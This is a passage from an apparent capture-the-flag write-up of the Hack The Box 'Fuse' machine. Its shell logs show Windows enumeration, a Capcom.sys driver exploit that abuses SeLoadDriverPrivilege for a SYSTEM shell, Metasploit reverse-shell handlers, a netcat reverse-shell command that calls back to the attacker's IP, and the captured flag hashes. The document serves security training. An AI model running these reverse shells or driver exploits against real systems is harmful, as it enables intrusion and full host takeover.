fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts Group S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-print\Documents> systeminfo
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo
+ ~~~~~~~~~~.
At line:1 char:1
+ systeminfo
+ ~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailed
SeMachineAccountPrivilege and SeLoadDriverPrivilege sounded like very interesting privileges.
User.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
*Evil-WinRM* PS C:\users> tree /F C:\Users
Folder PATH listing
Volume serial number is E6C8-44FE
C:\USERS
ÃÄÄÄAdministrator
ÃÄÄÄPublic
ÃÄÄÄsthompson
ÀÄÄÄsvc-print
ÃÄÄÄDesktop
³ user.txt
³
ÃÄÄÄDocuments
ÃÄÄÄDownloads
ÃÄÄÄFavorites
ÃÄÄÄLinks
ÃÄÄÄMusic
ÃÄÄÄPictures
ÃÄÄÄSaved Games
ÀÄÄÄVideos
*Evil-WinRM* PS C:\users> cd svc-print/Desktop
*Evil-WinRM* PS C:\users\svc-print\Desktop> ls
Directory: C:\users\svc-print\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 9/25/2020 1:23 PM 34 user.txt
*Evil-WinRM* PS C:\users\svc-print\Desktop> type user.txt
cea534708fb5e5dc92920ad8473e6553
tree gave some odd looking output, but showed me that the user.txt proof was right there in my service account user’s Desktop! (Why a service account has a Desktop I am not sure…)
Path to Power (Gaining Administrator Access)
Enumeration as svc-print
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
*Evil-WinRM* PS C:\users\svc-print\Desktop> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
39 3 1524 2568 3576 1 cmd
93 8 4964 9488 0.02 1220 0 conhost
109 9 5348 11228 1616 1 conhost
301 13 1996 4356 404 0 csrss
157 14 2124 8084 496 1 csrss
356 31 14976 22536 1744 0 dfsrs
157 12 2060 7176 2212 0 dfssvc
217 13 3776 12720 2892 0 dllhost
10328 12415 248472 239048 1200 0 dns
0 0 0 4 0 0 Idle
120 12 1684 5392 1148 0 ismserv
2022 414 58308 71184 632 0 lsass
430 39 51792 64804 1840 0 Microsoft.ActiveDirectory.WebServices
194 13 2944 9672 3064 0 msdtc
385 58 118384 84496 2164 0 MsMpEng
129 8 1756 5884 1128 0 pcpl
157 12 3388 11404 3972 0 PrintIsolationHost
312 11 4916 10176 624 0 services
51 2 364 1212 304 0 smss
469 24 5652 17296 1580 0 spoolsv
1257 64 23508 42260 288 0 svchost
618 44 9032 21744 344 0 svchost
366 14 3264 10104 824 0 svchost
449 19 3232 8956 880 0 svchost
711 24 6536 14928 964 0 svchost
385 16 8560 13968 976 0 svchost
388 32 8936 15960 1028 0 svchost
136 11 3820 10488 1140 0 svchost
305 17 5552 14736 1168 0 svchost
206 14 4484 11352 1364 0 svchost
136 9 1708 6864 1512 0 svchost
88 7 1084 5124 1772 0 svchost
247 15 2756 10916 1872 0 svchost
85 7 1056 5084 2040 0 svchost
240 19 8256 12748 2140 0 svchost
102 7 2320 8244 3076 0 svchost
798 0 128 144 4 0 System
163 12 1788 9172 3140 1 taskhostw
195 16 2404 10764 2616 0 vds
150 11 3036 9860 2108 0 VGAuthService
330 21 9116 22348 332 0 vmtoolsd
175 15 3356 12920 516 1 vmtoolsd
198 71 5812 13780 3856 0 w3wp
96 8 924 4876 488 0 wininit
189 10 1952 9392 572 1 winlogon
293 15 7516 16784 2992 0 WmiPrvSE
1346 29 56524 76172 0.88 2568 0 wsmprovhost
I checked running processes and didn’t see anything too exciting.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\users\svc-print\Desktop> services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe False ADWS
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\inetpub\wwwroot\papercut\pcpl.exe PCPrintLogger False PCPrintLogger
C:\Windows\SysWow64\perfhost.exe False PerfHost
C:\Windows\servicing\TrustedInstaller.exe False TrustedInstaller
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe" False VGAuthService
"C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" False VMTools
"C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\CommAmqpListener.exe" False VMwareCAFCommAmqpListener
"C:\Program Files\VMware\VMware Tools\VMware CAF\pme\bin\ManagementAgentHost.exe" False VMwareCAFManagementAgentHost
"C:\Program Files\Windows Defender\NisSrv.exe" True WdNisSvc
"C:\Program Files\Windows Defender\MsMpEng.exe" True WinDefend
Same with running services. I did notice that there was the print service for Papercut running, however.
Exploiting SeLoadDriverPrivilege
I decided that since the service account had the SeLoadDriverPrivilege privilege I would see if there were any published privilege escalation methods using it. I quickly found one at https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
┌──(zweilos㉿kali)-[~/htb/fuse]
└─$ evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i 10.10.10.193 -P 5985 1 ⨯
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-print\Documents> upload print.exe
Info: Uploading print.exe to C:\Users\svc-print\Documents\print.exe
Data: 98400 bytes of 98400 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-print\Documents> ./print.exe
*Evil-WinRM* PS C:\Users\svc-print\Documents> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
39 3 1524 2568 3576 1 cmd
109 9 5380 11244 1616 1 conhost
302 13 1996 4360 404 0 csrss
157 14 2124 8088 496 1 csrss
355 32 15336 23120 1744 0 dfsrs
161 12 2204 7236 2212 0 dfssvc
217 13 3776 12720 2892 0 dllhost
10330 12415 249204 239480 1200 0 dns
0 0 0 4 0 0 Idle
124 12 1684 5448 1148 0 ismserv
1986 415 53628 67776 632 0 lsass
425 39 52808 65676 1840 0 Microsoft.ActiveDirectory.WebServices
194 13 2944 9672 3064 0 msdtc
385 58 118384 84492 2164 0 MsMpEng
128 8 1752 5884 1128 0 pcpl
141 6 939484 940424 0.39 3524 0 print
157 12 3388 11404 3972 0 PrintIsolationHost
314 11 5044 10464 624 0 services
51 2 364 1212 304 0 smss
486 27 6132 19052 1580 0 spoolsv
1253 54 23716 42580 288 0 svchost
633 45 9012 22004 344 0 svchost
365 14 3268 10156 824 0 svchost
446 19 3416 9104 880 0 svchost
714 24 6660 15028 964 0 svchost
383 16 10416 15316 976 0 svchost
386 32 9332 16052 1028 0 svchost
136 11 3772 10476 1140 0 svchost
267 16 5804 15232 1168 0 svchost
204 14 4428 11356 1364 0 svchost
136 9 1652 6852 1512 0 svchost
88 7 1028 5108 1772 0 svchost
241 15 2808 10932 1872 0 svchost
85 7 1000 5072 2040 0 svchost
261 19 9272 14828 2140 0 svchost
102 7 2320 8240 3076 0 svchost
781 0 128 144 4 0 System
163 12 1788 9168 3140 1 taskhostw
195 16 2404 10764 2616 0 vds
150 11 3036 9860 2108 0 VGAuthService
330 21 9504 22924 332 0 vmtoolsd
173 15 3384 12940 516 1 vmtoolsd
194 19 5084 13352 3968 0 w3wp
96 8 924 4876 488 0 wininit
189 10 1952 9392 572 1 winlogon
294 15 8788 17968 2992 0 WmiPrvSE
663 26 52092 66048 0.47 4000 0 wsmprovhost
*Evil-WinRM* PS C:\Users\svc-print\Documents> Stop-Process -Name print
First I tried to see if I could get a meterpreter shell by uploading a reverse shell I created using msfvenom. I uploaded my malicious print.exe, ran it, and was given a meterpreter shell. I backgrounded my shell to try to use the exploit windows/local/capcom_sys_exec which was related to the exploit in the article.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
msf5 exploit(windows/local/capcom_sys_exec) > options
Module options (exploit/windows/local/capcom_sys_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 4 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 43242 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows x64 (<= 10)
msf5 exploit(windows/local/capcom_sys_exec) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/capcom_sys_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.74:43242
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
Unfortunately no matter how I configured the options, metasploit did not seem to think this machine was vulnerable. Some reading lead me to https://github.com/rapid7/metasploit-framework/pull/7363 which explained why this didn’t work:
This module achieves local privilege escalation on a Windows target by exploiting a “feature” provided by the CAPCOM.SYS driver for Windows x64. The “feature” is the driver allows for user-land functions to be executed in the context of the kernel. Currently this module has only been tested with Windows 7, but should work on earlier Windows versions or any other version that doesn’t have SMAP support.
I decided to run the exploits in a more manual way, following the article I found earlier.
1
2
3
4
5
6
7
8
meterpreter > sysinfo
Computer : FUSE
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : FABRICORP
Logged On Users : 5
Meterpreter : x64/windows
Using meterpreter’s sysinfo command I was able to verify that this version of Windows was x64-based.
Getting a shell
Going back to the article I found earlier, I found a few links to files needed for exploiting the SeLoadDriverPrivilege privilege.
Following the instructions, I had to compile the two files on Windows (with a matching x64 architecture). I customized the exploit a bit to have it call a simple .bat script I wrote to send me a netcat reverse shell. The four files needed for this to work were:
- Capcom.sys
- EOPLOADDRIVER.exe
- ExploitCapcom.exe
- My .bat script reverse shell
1
C:\Windows\Temp\nc.exe 10.10.15.74 55541 -e cmd.exe
I uploaded the four files required to C:\temp and tried to exploit the system, but for some reason I was not able to get back a shell. It took me a bit of troubleshooting, but I managed to track down the (very simple) reason why.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
*Evil-WinRM* PS C:\temp> ./EOPLOADDRIVER.exe System\CurrentControlSet\printer C:\test\Capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\printer
NTSTATUS: c000010e, WinError: 0
*Evil-WinRM* PS C:\test> ./ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000080
[*] Shellcode was placed at 0000020616710008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
I realized after compiling my exploits that I had accidentally written C:\temp in one file, and C:\test in the other. Luckily my user had permission to create these folders on the machine so it didn’t turn out to be too much of an issue. Next, I ran EOPLOADDRIVER.exe to create the registry key pointing to the malicious capcom.sys driver, then ran ExploitCapcom.exe to exploit this malicious driver to grant me a System shell.
Root.txt
After getting a System shell over netcat I once again uploaded my print.exe meterpreter reverse shell, and created a handler to catch it. For some reason meterpreter failed to load despite the handler getting a call back, so I recompiled my exploit to use the standard Windows TCP reverse shell windows/x64/shell_reverse_tcpinstead.
``text msf5 exploit(multi/handler) > options
Module options (exploit/multi/handler):
Name Current Setting Required Description —- ————— ——– ———–
Payload options (windows/x64/shell_reverse_tcp):
Name Current Setting Required Description —- ————— ——– ———– EXITFUNC process yes Exit technique (Accepted: ‘’, seh, thread, process, none) LHOST 10.10.15.74 yes The listen address (an interface may be specified) LPORT 55541 yes The listen port
Exploit target:
Id Name – —- 0 Wildcard Target
msf5 exploit(multi/handler) > exploit
[] Started reverse TCP handler on 10.10.15.74:55541 [] Command shell session 5 opened (10.10.15.74:55541 -> 10.10.10.193:64733) at 2020-09-26 17:26:09 -0400
C:\temp>whoami /all whoami /all
USER INFORMATION
User Name SID
=================== ======== nt authority\system S-1-5-18
GROUP INFORMATION
Group Name Type SID Attributes
====================================== ================ ============ ================================================== BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group Mandatory Label\System Mandatory Level Label S-1-16-16384
PRIVILEGES INFORMATION
Privilege Name Description State
========================================= ================================================================== ======== SeCreateTokenPrivilege Create a token object Disabled SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeLockMemoryPrivilege Lock pages in memory Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeTcbPrivilege Act as part of the operating system Enabled SeSecurityPrivilege Manage auditing and security log Disabled SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled SeLoadDriverPrivilege Load and unload device drivers Disabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Disabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeCreatePermanentPrivilege Create permanent shared objects Enabled SeBackupPrivilege Back up files and directories Disabled SeRestorePrivilege Restore files and directories Disabled SeShutdownPrivilege Shut down the system Disabled SeDebugPrivilege Debug programs Enabled SeAuditPrivilege Generate security audits Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeManageVolumePrivilege Perform volume maintenance tasks Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Disabled SeRelabelPrivilege Modify an object label Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
ERROR: Unable to get user claims information.
C:\temp>cd c:\Users\Administrator\Desktop
cd c:\Users\Administrator\Desktop
c:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is E6C8-44FE
Directory of c:\Users\Administrator\Desktop
06/01/2020 02:03 AM
c:\Users\Administrator\Desktop>type root.txt type root.txt 995555f7516045d9982eafbe2b0d6944 ```
I didn’t remember this until after I was doing my write-up, but I totally forgot to finish exploiting this machine. I had found out while enumerating through RPC that the user
sthompsonwas a Domain Administrator, so this should have been my end goal. If you get this far, try to see if you can go for the king of the hill and fully compromise this (non-existent) domain!
Thanks to egre55 for creating this fairly easy but interesting machine. It is always nice to encounter challenges that introduce new privileges to take advantage of!
If you have comments, issues, or other feedback, or have any other fun or useful tips or tricks to share, feel free to contact me on Github at https://github.com/zweilosec or in the comments below!
If you like this content and would like to see more, please consider buying me a coffee! 